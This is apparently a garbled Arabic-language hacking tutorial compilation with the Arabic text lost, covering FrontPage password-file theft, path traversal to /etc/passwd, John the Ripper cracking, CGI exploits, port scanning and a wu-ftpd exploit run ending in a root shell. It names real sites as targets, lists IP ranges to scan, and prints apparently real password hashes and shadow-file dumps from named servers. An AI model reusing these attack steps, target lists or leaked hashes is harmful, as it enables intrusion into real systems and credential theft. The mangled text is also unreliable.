;(setcookie('color',$_GET['color'],time()+36000
;('header('Location:index.php

}()function get_color
;global $_COOKIE
}((['if(isset($_COOKIE['color
;['return $_COOKIE['color
}else{
;"return "#FFFFFF
{
{

}()function clear_color
;(setcookie('color',$_GET['color'],time()-36000
;('header('Location:index.php
{

selection //

}('if ($do=='display_form
;()display_form

153

{}("elseif ($do=="set_color
;()set_color
{}("elseif ($do=="clear_color
;()clear_color
{
?<
display_form . set_color . get_color .
clear_color . -2 : index.php
get_color user.php :
:code
><html
>;('BODY bgcolor="<? include('user.php
<"<? ()echo get_color
><h1 <h1/>.....
><br

><br

> <"a href="user.php?do=display_form ><a/

><body/
><html/

154

" God Will "

> <
> : <
:
** html .
** ). 34 (
** Godwill .
:

155

http://www.geocities.com/love2002_il/godwill16.zip
tlsecurity :
:
html Godwill
...

html ...

156

 General Options ...

Done
...

157

 Gen
...enter Output 3
...

/http://www.tripod.lycos.co.uk ...
...
) ( zone Alarm ...
...
.

158

" "NOOP4
> <
>< .MoHfOx. :
god will .
.. godwill

noob 4.0
=======================================
=============================
-1

=================
======================
=============================
layout 2<<<<====:::
6
-2 Internet Explorer 5
-3 Internet Explorer5.5
4 5
-6

159

==================================================
===================
executable file 3 <<<<====:::
-7

-8
=======================================
=============================
-9 <<<<====:::

160

...

161

" "
><
><. ( T.O.L. ( DeXXa :
:
* .
* FrontPage Server Extensions .
* . Microsoft Office FrontPage
* . CHMOD
* . Telnet
* . HTTP
* . SQL
* Server Side Scripting
. Language




. Screen Capture
@ :
.
.
. FrontPage Server Extensions
. FrontPage Extension Server
. FrontPage Extension Server
. FrontPage
.
@
* . FrontPage Server Extensions
* .
* .
* .
@ :

PHP
CGI Perl SSL FTP . SQL
Webmasters Microsoft
Office FrontPage
162

 Office
.
@ FrontPage Server Extensions
) : (
Server
.
:
private_/
vti_bin_/
vti_cnf_/
vti_log_/
vti_pvt_/
vti_txt_/
:
* _: vti_bin
:
) : _( vti_bin
/vti_adm_/..
/vti_aut_/..

.
:
shtml.exe/..
fpcount.exe/..
* _: vti_pvt
:
: service.pwd DES.
: service.grp . authors deptodoc.btr : doctodep.btr
.
htaccess.
)

163

 ( .
) : (
* _: private
. htaccess.
@ FrontPage Extension Server
FrontPage Extension Server . HTTP
FrontPage Request
FrontPage Extension Server
fpcount.exe
Extension Server
.
@ : FrontPage Extension Server
FrontPage

FTP
.
: FrontPage Extension Server
) : XP
(
* FrontPage . Office
* File . Open Web
* ) ( .
*

.
*

.
@ FrontPage :
:
* :
) : _ vti_inf.html
(
FrontPage . - _ vti_inf.html :

164

http://www.Victim.com/_vti_inf.html
FrontPage Configuration Information FrontPage Extension Server
.
:
. Source Code "FPVersion="Version Version .* _: vti_cnf
FrontPage . :http://www.Victim.com/_vti_cnf
. Source Code :vti_generator:Programe
Programe Microsoft FrontPage X . X
* :
FrontPage . . Source Code > <Head></Head :><"Meta Name="GENERATOR" Content="Programe
Programe Microsoft FrontPage X.0
. X
* : NetCraft
. NetCraft.net . //:http .
FrontPage mod_frontpage/X X
. FrontPage Extensions Server
* : Telnet

165

) :
(
Start Run . Telnet 80 :Microsoft Telnet> Open www.Victim.com 80
Request Method . Head) : ( HTTP
http://www.Victim.net ISP.net :
Head www.Victim.net HTTP/1.1
Host: ISP.net
*/* :Accept
Connection: close
. Response Server .
FrontPage
mod_frontpage/X
X . FrontPage Extensions Server
@ :
_ vti_pvt :
) : PHP
(
* .
* PHP :
>?PHP
;("open = FOpen($file, "r$
;((get = FGets($open, FileSize($file$
;Echo $get
;FClose $open
?<

166

 PHP


file
:
http://www.Victim.com/uploded_file...../../etc/passwd
uploded_file
.

167

" "
> <
> :<
//
NT - Unix
-1 frontpage
:
netcraft/http://www.netcraft.com

mod_frontpage/x
)=x (
/_vti_inf.html
/http://www.almodammer.com:

http://www.almodammer.com/_vti_inf.html
Enter

Frontpage Configuration Information


/_vti_cnf
:
http://www.almodammer.com/_vti_cnf

source

vti_generator:Programe

Programe
------------------------------------------------- -2 frontpage
frontpage

/http://www.almodammer.com
fontpage _vti_pvt

http://www.almodammer.com/_vti_pvt
:
168

=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============

username:passwd

service
user / password

operator:hi9LHn9wAMuKM
operator:
hi9LHn9wAMuKM:


=)=(Crack Jack
=)=(John The Ripper

John The Ripper
::
http://www.openwall.com/john


\c:
RUN
txt passwd

start
run

command
Enter
DoS
RUN

cd..

>\c:

cd john
Enter

169


>c:\john

cd RUN

>c:/john/RUN
John The Ripper

====
john -i:all passd.txt
-------------------------
====
john -i:Alpha passwd.txt
---------------------------------
====
john -i:Digits passwd.txt
---------------------------------
====
john -single passwd.txt
--------------------------------
-------------------------------------------------------------------------------
john.pot

------------------------------------------------------------------------------- username password
!!
/
)(1
frontpage

file
open web

)(2
FTP
FTP
ws-ftp
pro ftp

170

 ...
DOS
======================================
google
/http://www.google.com

/_vti_pvt


/http://www.altavista.com

link:service.pwd
..
link:adminstrators
password.

171

" "
><
> :<
Random Hacking CGIScripts Random Hacking
spiders
altavista.com ) link:xxxx.cgi or pl (
help.cgi link:help.cgi
Ikonboard HTML
help.cgi http://www.example.com/cgi-
bin/help.cgi
?http://www.example.com/cgi-bin/help.cgi
helpon=../members/[member].cgi%00
] [member ][
Ikonboard
2.1.7
CGIScript url

Exploit
/http://www.secure.f2s.com/eng_ver/bugs
/http://www.securiteam.com

....

...
CGIScripts !!

(:
sites 12610 co.il 1104
sites org.il sites 70 ac.il .sites 78 gov.il
.sites 54 net.il .sites 29 muni.il sites 2009 com
.sites 137 net .org - 121 sites .edu - 4 sites israel.net - 84
.sites ........ .il - sites
http://iguide.co.il/sites/sites.htm

/http://www.achla.co.il
http://www.reshet.co.il/data/index.vs?dw=1
/http://www.maven.co.il
/http://www.tapuz.co.il
/http://www.walla.co.il
172

http://www.info.gov.il/find.pl
altavista.co.il


/w3-msql
proxy.isp.net.sa :8080 GET
GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0
*/* ,Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg
Accept-Language: ar-sa
(User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98
Host: www.com.il
Proxy-Connection: Keep-Alive
/http://www.com.il/cgi-bin cgi-
/bin/w3-msql
WWWMSQL
cgi-bin/w3-msql

WWWMSQL
w3-msql Exploit w3-msql
http://www.securiteam.com/exploits/2WUQBRFS3A.html
Random Hacking
w3-msql
/vti_pvt_/
HTML *html.
The page cannot be displayed..
Forbddien .... not found....
.. .....
url c
perl Shell *.sh Batch
perl exploit.pl exploit
(:
(:
> perl
exploit.pl > log.htm
Exploit

) ( RedHat 6.2
.

173

" "
><
>< marwan911 :

.

:IIS ) . (
:apache .

http://www.netcraft.net

whitehouse.org
: //:http /
http://uptime.netcraft.com/up/graph....whitehouse.org

The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows
2000

IIS5.0
2000

174

 IIS5.0 ) (
) 2000 (

IIS .
.



.

www.arank.com

)The site www.arank.com is running Apache/1.3.20 (Unix
mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6
mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6
on Linux

apache 1.3.20 FrontPage/5.0.2.2510
Linux

.



_ vti_pvt _ private

175

 service.pwd users.pwd authors.pwd

adminstators.pwd
) %70
(
goodyco:CalXS8USl4TGM
http://www.goody.com.sa/_vti_pvt/service.pwd
goodyco CalXS8USl4TGM
john the repaier
) (
john -i PASSWORD.FILE





telnet


c
================
/http://neworder.box.sk ) ( IIS
apache
/http://www.ussrback.com EXPLOITS
.. c perl
.

176

" "
> <
>:

.

( -1
( - ) IIS (
( - ) apachc (
( -2
( -3
( -4


IIS




.
apachc
.
.

177

" )>&<( "

> <
> : <
* : (:
* : D:
* : , .
* : , , !!
* : , (:
* : (:
:2 , .
:2 D:
NT & Unix
, FrontPage (:
:
Administrator.pwd
Administrators.pwd
Authors.pwd
Users.pwd
_vti_pvt
(: http://www.tradesystemlab.com/_vti_pvt/service.pwd :
service.pwd :
-FrontPage- #
tradesys:FpNTpIDWSk872
(:
:3 , S:
: , WS_FTP www
ftp ftp.ebnmasr.com : ,
(:
:4 :
tradesys:FpNTpIDWSk872 )(N
:4 !! , John The
, Ripper http://www.openwall.com/john :
:5 , ,
:5 !! , , (: : ,
, doc & run : , run :
: p:
command.com : , run
178

 tradesys:FpNTpIDWSk872 : txt passwd

, run , john.exe command.com :
<< john -single passwd.txt
<< john -i:Digits passwd.txt
<< john -i:Alpha passwd.txt
<< john -i:all passwd.txt ) , ,
( D:
john.pot :
:6 , ,
:6 , ;( , .
(:
:7 , ) , (Y
:7 , tradesys:FpNTpIDWSk872 : tradesys :
) ( :
:8 , $:
:8 ,,, ;( , ,
) ( D:
(:
:9 , , (:

: , : spiders
, ,
, walla.co.il : ,
;( .
:10 , , !!
:10 , $:
, , ,(: (: (: service.pwd :
:11 , , (:
:11 , EXPLOITES
, , (: , EXPLOITES
. /http://www.ussrback.com :

179

" CgiScaner "

><
> : <

1.
2 .
3 .
4 .
.
..
http://mypage.ayna.com/vox99/cgiscan3.zip

180

"
"
> <
> :<
:::
,,,
,,



...

181

 ::

27374 . 1243

**

.

------------

+
........ ,,,,
182

 ...
http://mypage.ayna.com/a7lla1/superscan.zip

<--------212.150.32.255---------------212.150.13.1
<----------62.0.180.255-----------------62.0.150.1
<--------199.203.72.255---------------199.203.75.1
<--------139.92.208.255---------------139.92.208.1
<--------192.114.42.255---------------192.114.42.1
<---------216.72.43.255----------------216.72.43.1
<-------212.143.113.255--------------212.143.113.1
<--------209.88.198.255---------------209.88.198.1
<--------212.29.238.255---------------212.29.238.1
<-------193.128.102.255--------------193.128.102.1
<-------192.117.236.255--------------192.117.236.1
<---------213.8.204.255----------------213.8.204.1
<--------212.25.120.255---------------212.25.120.1
<---------128.139.1.255----------------128.139.1.1
<------------212.2.227.255<-------------212.2.224.1
<-----------212.26.255.225<--------------212.26.1.1
<-----------213.238.20.255<-------------213.238.0.1
<------------212.102.3.255<-------------212.102.1.1
<----------212.116.195.255<-----------212.116.190.1
<-----------212.106.70.255<------------212.106.60.1
<-----------195.229.31.255<-------------195.229.6.1
<----------195.229.255.255<-----------195.229.224.1
<-----------194.170.30.255<------------194.170.30.1
<-----------213.42.255.255<--------------213.42.1.1
<-------------208.7.80.255<--------------208.7.70.1
<----------195.226.255.255<-----------195.226.240.1
<-----------195.39.145.255<------------195.39.130.1
<----------168.187.255.255<-------------168.187.1.1
<-----------194.133.255.25<-------------194.133.1.1
<------------209.58.40.255<-------------209.58.40.1
<-----------206.82.133.255<------------206.82.133.1
<-----------206.49.109.255<------------206.49.109.1
<-------------212.72.7.255<--------------212.72.1.1
<----------193.188.200.255<------------193.188.50.1

183

" Shadow Scan Security "

> <
> <
:





Shadow Scan Security


http://www.safety-lab.com/SSS.exe

http://www.e3sar.net/almodammer/ShadowSecurityScanner5.35.exe
:
========================================
SetUp

:

184

+++++++++++
[] ][1
[] ][2
========================================
*****& &*****

=)
Start


ShadowScanSecurity
(=
-1-

Scanner
-2-

185

 =1 4 )
(
=2
=3 4

=4
=5
=6
=7
-3-

186

) (1 -2-
) (2
) (3
-4-

+1+
+2+
+ 3+
+4+
+ 5+ :-3-
+ 6+
+ 7+
-5-
Done

187

-6-
Start Scan
1 -5-

" "
> <
> : <

etc/shadow/

188


etc/shadow/
BSD
etc/master.passwd/
SGI ARIX
etc/shadow/
AIX
etc/security/shadow/
)) )) - )) 64 64
(( (( ((
etc/shadow/
)) MD5 ((
)) (( NT - XP - 2000
)) (( LanMan
winnt/system32/config/sam/
))
((
)) ((
_.winnt/repair/sam or sam/
)) - ((
WINNT
.Windows

" ) ( "
> <

189

 :
..
..
..
Telnet ..
Telnet
Port )( )
(Daemon .
: )( )(
)( .. ) (Telnet
) (Daemon ..
.. ) ( ) ( .
Telnet ) ( ..
.
Daemon .
Telnet FTP Client
FileTransfer Protocol
.. 21

Telnet FTP Client
!! FTP
..

-1 Telnet ftp.zdnet.com 21

- Sources Code
.l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready 220

Banner FTP Daemon zdnet

.
.
-2 Username .. Password
zdnet Anonymous :

- Sources Code

190

user anonymous

- Sources Code
.Guest login ok, send your complete e-mail address as password 331

- Sources Code
pass @zorro

Anonymous
.. ) ) @

- Sources Code
.You are user #552 of 2000 simultaneous users allowed-230
-230
.Logged in anonymously 230

.. ..
.
)
( .. !!
.

: )( IP
.
..
.
: PASV

191

 - Sources Code
PASV

IP ) ( )(
..

- Sources Code
(Entering Passive Mode (207,189,69,61,12,41 227

..
) ( IP .. 207,189,69,61

3113 = 41 + 256 12
.. 3113
Telnet ftp.zdnet.com
.. 3113
..

( LIST (
- Sources Code
LIST

- Sources Code
.Data connection already open; Transfer starting 125

192


.

.. PASV .

..
) ( .

.. CuteFTP!!

http://www.vbip.com/winsock/winsock_ftp_01.asp
) (
) http://www.vbip.com/winsock/winsock_ftp_ref_01.htm (
) http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html
(.

" ) ( "
> <
> :<

193

 :
~~~~~~~~~
. password file password file ) (encryption ) (shadowed -

-:
~~~~~~~~~
!
) ( Void Eye

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
nmap
www.inscure.org/nmap
SuperScan
Perl Perl
C
( /http://www.7lem.com
ping (
) (587 - 514 - 513 - 143 - 110 - 37 - 25 - 23 - 22 - 21
...


23 /http://www.7lem.com

/telnet http://www.7lem.com

194

 Windows Linux SunOS FreeBSD QNX

Linux ...
Linux
---------------------SunOS 5.7
---------------------- login :
SunOS 5.7
) (


nc http://www.7lem.com/ 80
---------------------.
.
.
Apache/1.3.* Server
.
.
--------------------- ...
110 25
smtp pop
) ( Linux
host 7lem.com

-:
) (
-:
.... queso

/queso http://www.7elm.com
queso 80
... SunOS 5.7
/http://www.condor.com ) support
webmaster ... info ( DNS
whois
whois whois whois
man whois

195

http://www.psyon.org/tools/index.html

whois

http://www.google.com/search?q=whois&btnG=Google+Search

~~~~~~~~~~~~~~~~~~~~~~~~~~
void eye ShadowSecurityScaner !!






Apache IIS CGI Perl PHP


..



counter
mp3 Don't Tell Me


25 23 21 110
Ikonboard v2.1.8b
Ikonboard v2.1.8b Ikonboard v2.1.7b
cgi pl

% 80 cgi
etc/passwd
FreeBSD
shadow master.passwd ..
...
++++++++++++++++++++++++

} { http://www.fbunet.de/cgibin/nph-%20%20%20%20%20.cgi CGI
....

196




: timduff.com




i'm from saudi arabia



/../../../../../../../../../../../../../../../../../
/../ !
-:
-1
-2
.....
-3 ) ( Perl - Cgi
-4 %100
) (
-5 )
(

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/http://www.timduff.com
) (
)( sh
shell * sh.
shell
)(bat

197

 )( C

gcc
gcc Exploit.c -o Exploit
) * c. * C. c
++ )* (h.
(

Perl
)
(
....
= Exploit

password file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


-----------------------------------------------------------------------------------------------root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network
Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh

198

landmark:x:1000:1000::/web/landmark:/bin/ksh
-----------------------------------------------------------------------------------------------
10

......

~~~~~~~~~~~~~~~~~~~~~~~~~~
!...

* = x Shadowed
= EpGw4GekZ1B9U DES
FreeBSD 13

password file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~
Ctrl + Shift
... hwwilson.com
-:
root:x:0:1:Super-User:/:/sbin/sh
root
root

199

x
x

0

1

Super-User:/:/sbin/sh

++++++++++++++++++++++++++++

) (encryption ) (shadowed~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
shadow file * x # !
root:x:0:1:Super-User:/:/sbin/sh

root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
Q71KBZlvYSnVw
....

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~
Crack 5.0a john the ripper jack the ripper
Crack 5a john the
ripper john the ripper .....
-:
wordlist .

200

\ -----------------------------------------------------------------------------------------------------> Q2wrtUo9LPq2R
| } ---> //{ | /---/ | / 1 / wordlist
| _____________ / 0 / | }{ | | / 1 / |----\ / 0 / ---------^--------
| word list -> Q6LiJ6ct1oUBz /---/ | |
_____________| \ ------song--------// ------------------

..
| | ------------------------------------------------------------------------------- -:

}{ | 5000 ) john the ripper (700
| -------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
john the ripper
john -w:wordlist passwd
wordlist
passwd
-----------------------------------------------------------------------------------------------Microsoft(R) Windows 98
).C)Copyright Microsoft Corp 1981-1998
E:\Desktop\junk\john the ripper>john -w asswd passwd.txt
by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996
Loaded 1 password
**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE
<E:\Desktop\junk\john the ripper
----------------------------------------------------------------------------------------------- john.pot

...
brute force
wordlist 3
.. wordlist

5000 wordlist brute
force
john the ripper brute force
john -i passwd

201

 passwd
...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
Unshadow !!
) ( shadow file
:
* = Linux : /etc/shadow token
= SunOS : /etc/shadow token *
* = FreeBSD : /etc/master.passwd or /etc/shadow token x
IRIX : /etc/shadow token = x
! = AIX : /etc/security/passwd token
* = ConvexOS : /etc/shadow or /etc/shadpw token
token passwd
! etc/security/passwd/
)
(
shadow
-----------------------------------------------------------------------------------------------::::::root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::
::::::lp:NP:6445
-----------------------------------------------------------------------------------------------
passwd file shadow passwd
...
http://wilsonweb2.hwwilson.com/etc/passwd
-----------------------------------------------------------------------------------------------root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network

202

Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
:/:nobody4:x:65534:65534:SunOS 4.x Nobody
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
----------------------------------------------------------------------------------------------- x token
etc/shadow/

http://wilsonweb2.hwwilson.com/etc/shadow

-----------------------------------------------------------------------------------------------root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: bin:NP:6445::::::
sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445::::::
uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*:::::::
nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445::::::
www:WJctaI.8rcSe2:10507:::::: mirrors:gg9p.5kwGw1MY:10911::::::
sid:stXldZKnujFYo:10515:::::: mirror:iMPWwbrU.gB4k:10601::::::
admin:hDhB5YYKyWgQw:10976:::::: jerome:XDqnOl32tPoGo:10976::::::
::::::erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185
----------------------------------------------------------------------------------------------- x

-:
...

-:

www.securiteam.com/exploits/archive.html

/http://www.ussrback.com
+
/http://www.secureroot.com

203


/http://www.rootshell.com

/http://www.ussrback.com

www.secureroot.com/category/exploits

www.hitboss.com/Hacking

www.undergroundnews.com/resources/s...ound/search.asp
Warez.com-Underground
/http://www.warez.com
Hacking
((
/http://www.neworder.box.sk
Security Search Engine
/http://www.bugs2k.com
insecure
/http://www.insecure.org
<XMP></BODY></HTML/>
http://public.www.easynet.co.uk/cgi...ail/formmail.pl

" (" )

204

> <
...

..

.....


....

* ) (host
* ) (passwd
/etc/passwd
shadow passwd

john the ripper

) (pwd ) (


bin
etc passwd
dev
lib
tmp
usr
nt
205

 nt admin.pwd
*
cgi-bin cgi

php.cgi
/http://www.jewish.org
/http://www.jewish.org /cgi-bin php.cgi

http://www.jewish.org/cgi-bin/php.cgi


scripts
http://www.jewish.org/scripts/php.cgi
scripts winnt
cgi-bin

" )( "

206

><
>< ICER :
: ...
)(
...
(:

nslookup, host, dig, ping, traceroute,telnet, ssh, ftp
gcc )... (
nmap and netcat .
* :
-1 ..
.
-2 nmap
-3 NetCat
-4


...
....
* :
(a) Linux (http://www.slackware.com
(b) Nmap (http://www.insecure.org
(/c) NetCat (http://www.l0pht.com/~weld/netcat
-:
-1 ) ( P:
-2 nmap :
*tar zxvf nmap.tar.gz (1
cd nmap (2
configure && make && make install/. (3
-3 ..
www.target.com
-4
nslookup www.target.com
196.1.2.3
-5 -:
""nmap -sS -O 196.1.2.3
-:
root@IcEr:~# nmap -sS -O 196.1.2.3
( /Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap
:(Interesting ports on www.target.com (196.1.2.3
)(The 1531 ports scanned but not shown below are in state: closed

207

Port State Service

tcp open ftp/21
tcp open smtp/25
tcp open http/80
tcp open sunrpc/111
tcp open auth/113
tcp open printer/515
tcp open unknown/963
tcp open kdm/1024
tcp filtered krb524/4444
tcp open X11/6000
tcp filtered napster/6699
OS guess for host: Linux 2.2.14-2.2.16
(Uptime 0.160 days (since Mon Apr 30 14:51:06 2001
Nmap run completed -- 1 IP address (1 host up) scanned in 67 seconds
#~:root@IcEr

(:
...
FTP ..
daemon

-: FTP daemon
"telnet 196.1.2.3 21"

"ftp 196.1.2.3"

:
root@IcEr:~# ftp 196.1.2.3
.Connected to 196.1.2.3
www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 220
(SAST 2000
.ready
Name (target:root): anonymous
.Guest login ok, send your complete e-mail address as password 331
:Password
Welcome, archive user! This is an experimental FTP server. If have-230
any
unusual problems, please report them via e-mail to-230
root@IcEr.pandora.net
If you do have problems, please try using a dash (-) as the first-230
character
of your password -- this will turn off the continuation messages that-230
may
.be confusing your ftp client-230
-230

208

.Guest login ok, access restrictions apply 230

.Remote system type is UNIX
.Using binary mode to transfer files
ftp>by
#~:root@IcEr
.wu-2.6.0
(; anonymous
####### #######
-: 8 7
.FTPd
( )
wuftpd2600.c
red hat 6.2


root access
(-;
root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3
Target: 196.1.2.3 (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1)
from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
..loggin into system
USER ftp
.Guest login ok, send your complete e-mail address as password 331
<PASS <shellcode
Next time please use your e-mail address as your password-230
for example: icer@ae.net -230
.Guest login ok, access restrictions apply 230
STEP 2 : Skipping, magic number already exists:
[[87,01:03,02:01,01:02,04
STEP 3 : Checking if we can reach our return address by format string
(STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now
.STEP 5 : Sending code.. this will take about 10 seconds
Press ^\ to leave shell
Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686
unknown
(uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp
!Bang! You have root
..
man gcc
..
(:

search..U will find what U wanna
.. .. .. ...
.. annonymous

209

 ..
..
..
..
.. .

" " htaccess

210

><
>< BSD-r00t :
|

| *
|
| * htaccess.
|
| * htaccess.
|
| * error
| * | index
|
| * /
|
| *
|
| * .htpasswd
|
| * htaccess.
|
| * htaccess.
|
| *
|
| *
-------------------------------------------------*
----------- ,

.. htaccess. .

* htaccess.
---------------------- -1
-2 error
-3 index
-4/
-5 .. html , .asp.
-6
* htaccess.
-------------------------- " "Notepad

htacces. txt. ,

" - "htaccess. . -
* error
-----------------------

211

 .
error -:
- error
-
- htaccess.
ErrorDocument error_num
directory_file
error_num " " directory_file
error
.
ErrorDocument 404
:
/errors/nfound.html
errors - :
----------------------| | Bad Syntax | 400
----------------------| | Unauthorized | 401
----------------------|
| Not Used | 402
----------------------| | Forbidden | 403
----------------------| | Not Found | 404
----------------------* index
---------------------------------------------- index

-:
- index " "
- htaccess. -:
Options -Indexes
* /
------------------------------------ htaccess.


..
- :
???deny from ???.???.???.
... .
-:
deny from all
-:
... allow from

212

 ...
*
------------------------------------ Redirection htaccess.

htaccess.

-:
???Redirect /somewhere/???.???/???.
http://www.site.com/newlocation
???.???/somewhere/
???.???/http://www.site.com/newlocation
.
---------* .htpasswd
----------------------- , htaccess. .
htaccess
htpasswd -:
user1:EncryptedPwd1
user2:EncryptedPwd2
o user1 , user2 .
o EncryptedPwd1 , EncryptedPwd2


http://www.euronet.nl/~arnow/htpasswd

http://www.e2.unet.com/htaccess/make.htm
Security fu93hds3

http://www.euronet.nl/~arnow/htpasswd
o username : Security
o passwrod & re-enter password : fu93hds3
o claculate Security:893bNicBcwszw <--
htaccess. .
htaccess
.
* htaccess.
---------------------------
, .
htaccess.

.

213

 --:
AuthUserFile /somewhere/.htpasswd
"AuthName "Enter your user and passed
please
Require valid-user
AuthType Basic
><Limit GET POST
require valid-user
><Limit/
o /somewhere/.htpasswd htpasswd.
o Enter your user and passed please

* htaccess.
---------------------------- ,
..
- :
><Files .htaccess
order allow,deny
deny from all
><Files/
. error 403
*
------------------------------ html. txt. .
-:
AddType text/plain html
-:
http://www.pharaonics.net/books/MIME.txt

" " FTP

214

> <
> :<
FTP
FTP File Transfer Protocol
TCP/IP
FTP
Formats
,FTP .
:
:
:Download
Host .Local
:Uplaod
Local .Host
:
:Secure FTP
.
:Anonymous FTP
guest anonymous
.
:
:Public Domain

.
:Freeware
.
:Shareware

215

FTP :

:ASCII
) (American Standard Code for Information Interchange
bits .127
.
.
:Binary
bits 255
.
ASCII & jpg & gif
bmp avi - ram - mpg - mp3 -
wav
exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - :
b64 - bhx MS Office
.

: FTP
:
UNIX
:UNIX
:ascii ASCII
.
:binary
.
:status ASCII .Binary
:help .UNIX

216

 :dir
:ls .
:cd directory .
:get filename .
:mget filename .
:pwd .
:bye .
:Shell


Tripod Unix Shell ftp ftp :
ftp.tripod.com " "IronPrivate
"******" . Unix.

Unix
:
http://www.pc-worlds.net/lunexx.html
.
:Browser
URL
ftp:// http:// FTP
.
:SLIP/PPP
.Client Programs
Windows .Ws_ftp
:Ws_ftp LE 5.06
Session
Profile Profile Name
My Home Page In Tripod Host Name
ftp.tripod.com Host Type Auto Detect
User ID

IronPrivate Password ****** ,

.OK :

217



... .
.
:Telnet
Telnet
. .

Windows
"" .

Telnet :Windows Telnet Start

Windows
Run Telnet .. Connect Remote
.System Connect Host Name
Port ) (
Term Type . Connect
. Disconnect Connect
.Exit

" "FTP
218

> <
>< hacker dz :

FTP

21

FTP

Superscanne


Start

Run

ftp n

<FTP


Open

Enter

<FTP
To

To



Connected to www.assassin.com
.(websrv1 Microsoft FTP Service (Version 4.0 220

ftp>quote user ftp

Anonymous acces allowed, send identify (e-mail name) as 331
.password

ftp>quote cwd ~root

Please login with USER and PASS 530

ftp>quote pass ftp
219



.Anonymous user logged in 230




20


Pwd

Cd

Cd black

Ls

Get

Get black.exe
Put

Get

Put black.exe
Clos



:Codes:
Signification
.Restart marker reply
110
(Service ready in nnn minutes. (nnn est un temps
120
.Data connection already open; transfer starting
125
.File status okay; about to open data connection
150
.Command okay
200
.Command not implemented, superfluous at this site
202
.System status, or system help reply
211
.Directory status
212

220

.File status
.Help message
.NAME system type
.Service ready for new user
.Service closing control connection
.Data connection open; no transfer in progress
.Closing data connection
.(Entering passive mode (h1, h2, h3, h4, p1, p2
.User logged in, proceed
.Requested file action okay, completed
.PATHNAME" created"
.User name okay, need password
.Need account for login
.Requested file action pendingfurther information
.Service not available, closing control connection
.Can't open data connection
.Connection closed; transfer aborded
Requested file action not taken. (Fichier dj utilis par autre

213
214
215
220
221
225
226
227
230
250
257
331
332
350
421
425
426
450
(chose
.Requested action aborded: local error processing
451
Requested action not taken. (Pas assez de mmoire pour
452
(excuter l'action
.Syntax error, command unrecognized
500
.Syntax error in parameters or arguments
501
.Command not implemented
502
.Bad sequence of commands
503
.Command not implemented for that parameter
504
